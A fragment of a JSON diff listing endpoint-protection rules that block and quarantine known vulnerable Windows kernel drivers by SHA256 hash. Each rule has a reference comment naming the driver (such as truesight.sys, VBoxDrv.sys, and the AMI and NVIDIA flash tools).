+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618075Z",
+ "creation_date": "2026-03-23T11:45:29.618077Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618085Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "50aa2b3a762abb1306fa003c60de3c78e89ea5d29aab8a9c6479792d2be3c2d7",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "71b97a78-e69b-5abd-b3e0-c2c8555fc9a2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.482727Z",
+ "creation_date": "2026-03-23T11:45:31.482731Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.482741Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0acef0a19973a7853d09e83a32e745cd38d4dcb88564e7575d783c0c13cfd7f9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "71e13771-07d2-5a60-9097-94c939d8260c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829863Z",
+ "creation_date": "2026-03-23T11:45:30.829865Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829887Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "20dbc1837e8b10bb35b582167918dd5818026c06a9b4187405925d42eea669ee",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "71e27892-3104-5e0a-ac6f-d98226e0277b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.479732Z",
+ "creation_date": "2026-03-23T11:45:31.479736Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.479746Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "843990c940711a684d360087216592cddf51742c21a134e6fe309eb49032da53",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "71e5040a-f34d-5be9-960b-6cf164bce658",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155805Z",
+ "creation_date": "2026-03-23T11:45:31.155807Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155813Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0eb2b056075631ee5d4765beb21802a883ece09aa43e9475dd6435f0b7a5ebec",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "71f45c13-ecca-59be-9a27-644f05fe2555",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831074Z",
+ "creation_date": "2026-03-23T11:45:30.831076Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831081Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cdf0d7a896541d9711a4361edb602ca050d769fd5f0b0ef87a50a2962b616a6b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "720280d9-a0dc-5f08-ba71-22e1e076dffe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812081Z",
+ "creation_date": "2026-03-23T11:45:31.812083Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812088Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "575dab49b1edb95a6cb08375428806b262796e5b54517cda608844bc4021571e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "720318e1-5d38-5cf9-a79f-649efecec71f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616988Z",
+ "creation_date": "2026-03-23T11:45:29.616990Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616996Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2ee914c20b3e4a321bcd2ea2f0f437cda6da09dc0819cd6f06960c0567f4cb19",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "72297edc-c90d-5e63-9075-095b98b7d967",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819226Z",
+ "creation_date": "2026-03-23T11:45:30.819228Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819233Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "77aabfc119686757d31cc9d21af9bf3bacecaae09dc92e548355a145db0aa774",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "722abf29-350f-5aec-aae7-d637fbdf1a3d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619422Z",
+ "creation_date": "2026-03-23T11:45:29.619424Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619429Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "64d060216cf55210f595609487b708d5e70e0706a8de0827369bf58898205f34",
+ "comment": "Realtek vulnerable driver (aka rtkio64.sys, rtkiow10x64.sys and rtkiow8x64.sys) [https://github.com/blogresponder/Realtek-rtkio64-Windows-driver-privilege-escalation] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "722cf7bf-5fdc-5090-a8b2-94b6d6b2815e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982765Z",
+ "creation_date": "2026-03-23T11:45:29.982767Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982773Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1f90d9c4d259c1fde4c7bb66a95d71ea0122e4dfb75883a6cb17b5c80ce6d18a",
+ "comment": "Vulnerable Kernel Driver (aka d3.sys) [https://www.loldrivers.io/drivers/13b2424a-d337-4bc7-ad1d-2049c79906b4/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7233b28c-2592-527a-b88e-a25c7e92e4da",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831713Z",
+ "creation_date": "2026-03-23T11:45:30.831715Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831720Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7cd32d0dcff4f90f0748d657ce5ac439605d30fadde084715479c3c3301552a0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7234d27d-d3f6-500c-954b-06eeee243033",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832022Z",
+ "creation_date": "2026-03-23T11:45:30.832024Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832030Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5a195eb7e92b9aadaf6a3d56267d60acd9dd7f1bab14c3359d2c7ac84ff26afb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7237a396-cff4-55c2-85e8-da29c1d2165c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608848Z",
+ "creation_date": "2026-03-23T11:45:29.608850Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608855Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c62bf9d0cc1edfffc15f3f002cd7f51efe3372320ec89d9dc96011000915c186",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "723ea7f7-c4c3-59ea-9bfc-fe24a5456507",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819135Z",
+ "creation_date": "2026-03-23T11:45:31.819138Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819143Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "519b16721301d8d48f85be37a8710735d686ed128aaacaf0ca0599dfd4d4466c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7240064e-aada-52f4-b1f8-23446c613cad",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617132Z",
+ "creation_date": "2026-03-23T11:45:29.617134Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617139Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7e8e7bc080b4c32ce703b3e8b3cc7e13fa9ef2422dc6f370a2c2b82496564aae",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "724b8135-c813-5c7a-9ee8-444dadbbe9a3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489452Z",
+ "creation_date": "2026-03-23T11:45:31.489455Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489463Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8e24bdf488308df21bcff4c381d235b536e34545bfe4e005bdff58b67622b7de",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "724d73f9-d673-5b10-a84d-d3afcc9416d9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491271Z",
+ "creation_date": "2026-03-23T11:45:31.491274Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491282Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "afc3e6f78dec5a0763e5b24bbcadc00f11d602c92460536d00cbb5cef8fc441f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "724ee48e-a0c8-56dd-b4ff-8dca7aca1e28",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457012Z",
+ "creation_date": "2026-03-23T11:45:30.457015Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.457024Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a298cc166fe3bac9e9e4cae967f8e3bb41b08a6a97117ca4f8e5c4f198dbcffa",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "724f12ac-88fc-5a7e-b859-ad34b5d8cabe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153858Z",
+ "creation_date": "2026-03-23T11:45:31.153860Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153865Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e502b63c5fac48bca6fc42c02aecf126310ddb318950222fe37402c0ec3ae15c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "725edd8d-7a53-5d46-b574-cb7ddfdbf9c1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148555Z",
+ "creation_date": "2026-03-23T11:45:31.148557Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148562Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a7a61e11e82a08261b9816fefbeadc3b3253596a2a5e13d3cf6b521431245d3a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "726678cf-a8df-5f40-affe-ea4fc8030dea",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.477891Z",
+ "creation_date": "2026-03-23T11:45:30.477895Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.477904Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "32d6b047b0489421f7983da7d5d11f8deb2a56935d5ae0ae23cca1c0903ecad5",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "72741d26-8907-5c09-8834-91f03916f3ec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
